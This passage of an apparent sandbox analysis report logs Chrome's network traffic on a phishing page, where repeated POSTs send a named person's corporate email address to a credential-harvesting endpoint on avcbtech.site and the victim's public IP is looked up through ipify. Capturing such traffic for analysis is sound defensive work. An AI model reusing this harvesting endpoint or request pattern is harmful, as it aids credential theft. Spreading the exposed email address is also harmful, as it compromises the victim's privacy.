2025-03-24 09:14:24 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 38 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:14:24 UTC	38	OUT	Data Raw: 61 69 3d 64 61 72 69 61 2e 63 7a 61 6a 6b 6f 77 73 6b 61 25 34 30 72 6f 63 6b 77 6f 6f 6c 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=daria.czajkowska%40rockwool.com&pr=
2025-03-24 09:14:25 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:14:25 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=f83e9ca96b7c137af97ad96d16cc40f6; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 09:14:25 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49787	104.26.12.205	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:14:25 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:14:25 UTC	467	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:14:25 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92550ee55d2fad1b-EWR server-timing: cfL4;desc="?proto=TCP&rtt=103947&min_rtt=103482&rtt_var=22262&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=35973&cwnd=252&unsent_bytes=0&cid=a902c29a53afee72&ts=258&x=0"
2025-03-24 09:14:25 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49789	172.67.74.152	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:14:25 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:14:26 UTC	434	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:14:25 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92550ee85d18423f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=103469&min_rtt=103032&rtt_var=22051&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=961&delivery_rate=36052&cwnd=226&unsent_bytes=0&cid=1189dd3e8e168be7&ts=263&x=0"
2025-03-24 09:14:26 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49788	104.168.138.190	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:14:25 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=6ea51597d57187987fff4dc0e381fc69
2025-03-24 09:14:26 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:14:26 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 09:14:26 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49794	104.168.138.190	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:15:05 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 38 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:15:05 UTC	38	OUT	Data Raw: 61 69 3d 64 61 72 69 61 2e 63 7a 61 6a 6b 6f 77 73 6b 61 25 34 30 72 6f 63 6b 77 6f 6f 6c 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=daria.czajkowska%40rockwool.com&pr=
2025-03-24 09:15:06 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:15:05 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=6e90f41bb76e35d15aa3fe1a8eb6978c; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 09:15:06 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49796	104.26.12.205	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:15:05 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:15:06 UTC	467	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:15:06 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92550fe2ea44434b-EWR server-timing: cfL4;desc="?proto=TCP&rtt=101553&min_rtt=101031&rtt_var=22097&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1121&delivery_rate=36309&cwnd=180&unsent_bytes=0&cid=3f2032f97b8d821a&ts=258&x=0"
2025-03-24 09:15:06 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49797	104.168.138.190	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:15:06 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=6ea51597d57187987fff4dc0e381fc69
2025-03-24 09:15:06 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:15:06 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 09:15:06 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49798	104.26.13.205	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:15:06 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:15:06 UTC	434	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:15:06 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92550fe68b604334-EWR server-timing: cfL4;desc="?proto=TCP&rtt=104682&min_rtt=103446&rtt_var=23104&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=36004&cwnd=242&unsent_bytes=0&cid=3582a5c18bd918a8&ts=261&x=0"
2025-03-24 09:15:06 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49799	104.168.138.190	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:15:36 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 38 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:15:36 UTC	38	OUT	Data Raw: 61 69 3d 64 61 72 69 61 2e 63 7a 61 6a 6b 6f 77 73 6b 61 25 34 30 72 6f 63 6b 77 6f 6f 6c 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=daria.czajkowska%40rockwool.com&pr=
2025-03-24 09:15:36 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:15:36 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=6d7bb80c6b7d16ec806e550b5453bff9; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 09:15:36 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49801	104.26.12.205	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:15:36 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:15:36 UTC	465	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:15:36 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925510a2b9e91a38-EWR server-timing: cfL4;desc="?proto=TCP&rtt=99203&min_rtt=98873&rtt_var=21353&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1121&delivery_rate=37305&cwnd=217&unsent_bytes=0&cid=aa00c807264a6e1a&ts=262&x=0"
2025-03-24 09:15:36 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49803	104.26.13.205	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:15:37 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:15:37 UTC	434	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:15:37 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925510a5b8ee499b-EWR server-timing: cfL4;desc="?proto=TCP&rtt=104111&min_rtt=102317&rtt_var=24280&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=34576&cwnd=250&unsent_bytes=0&cid=f481b1cc4fdb67f6&ts=262&x=0"
2025-03-24 09:15:37 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49802	104.168.138.190	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:15:37 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=6ea51597d57187987fff4dc0e381fc69
2025-03-24 09:15:37 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:15:37 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 09:15:37 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49804	104.168.138.190	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:16:06 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 38 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:16:06 UTC	38	OUT	Data Raw: 61 69 3d 64 61 72 69 61 2e 63 7a 61 6a 6b 6f 77 73 6b 61 25 34 30 72 6f 63 6b 77 6f 6f 6c 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=daria.czajkowska%40rockwool.com&pr=
2025-03-24 09:16:07 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:16:06 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=f94f10a4541e05d57245d395b80a9026; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 09:16:07 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49806	104.26.12.205	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:16:07 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:16:07 UTC	467	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:16:07 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925511612a795e74-EWR server-timing: cfL4;desc="?proto=TCP&rtt=104336&min_rtt=103817&rtt_var=22683&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1121&delivery_rate=35345&cwnd=222&unsent_bytes=0&cid=5d2d3b9be70dbfba&ts=264&x=0"
2025-03-24 09:16:07 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49807	104.168.138.190	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:16:07 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=6ea51597d57187987fff4dc0e381fc69
2025-03-24 09:16:07 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:16:07 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 09:16:07 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49808	104.26.13.205	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:16:07 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:16:07 UTC	433	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:16:07 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925511642b424400-EWR server-timing: cfL4;desc="?proto=TCP&rtt=101159&min_rtt=99781&rtt_var=22482&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=37329&cwnd=250&unsent_bytes=0&cid=cc3ee5648bf01981&ts=265&x=0"
2025-03-24 09:16:07 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Click to jump to process

Target ID:	1
Start time:	05:12:45
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	05:12:49
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2320,i,11972837007240688356,14361615590807501320,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2588 /prefetch:3
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
